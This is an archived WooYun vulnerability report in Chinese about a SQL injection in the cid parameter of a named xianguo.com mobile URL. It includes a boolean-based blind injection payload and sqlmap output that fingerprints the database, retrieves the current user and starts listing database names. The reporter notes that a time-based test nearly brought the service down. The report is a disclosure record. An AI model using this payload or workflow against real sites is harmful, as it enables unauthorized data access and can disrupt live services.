乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-12: 细节已通知厂商并且等待厂商处理中 2015-06-17: 厂商已经主动忽略漏洞,细节向公众公开
233
用timepayload测试,差点把服务弄死了。http://m.xianguo.com/homeindex/list?cid=1&tagid=7_31
---Parameter: cid (GET) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: cid=(SELECT (CASE WHEN (1888=1888) THEN 1888 ELSE 1888*(SELECT 1888 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&tagid=7_31---[14:46:19] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Ubuntuweb application technology: PHP 5.5.9back-end DBMS: MySQL 5.0[14:46:19] [INFO] fetching current user[14:46:19] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[14:46:19] [INFO] retrieved: reader@%current user: 'reader@%'[14:46:31] [INFO] testing if current user is DBA[14:46:31] [INFO] fetching current user[14:46:32] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'current user is DBA: False[14:46:32] [INFO] fetching database names[14:46:32] [INFO] fetching number of databases[14:46:32] [INFO] retrieved: 35[14:46:34] [INFO] retrieved: information_schema[14:46:57] [INFO] retrieved: analy。。。。。。。服务还是有点不稳定,就不跑了。
~~~~~~~~~
危害等级:无影响厂商忽略
忽略时间:2015-06-17 15:04
漏洞Rank:15 (WooYun评价)
暂无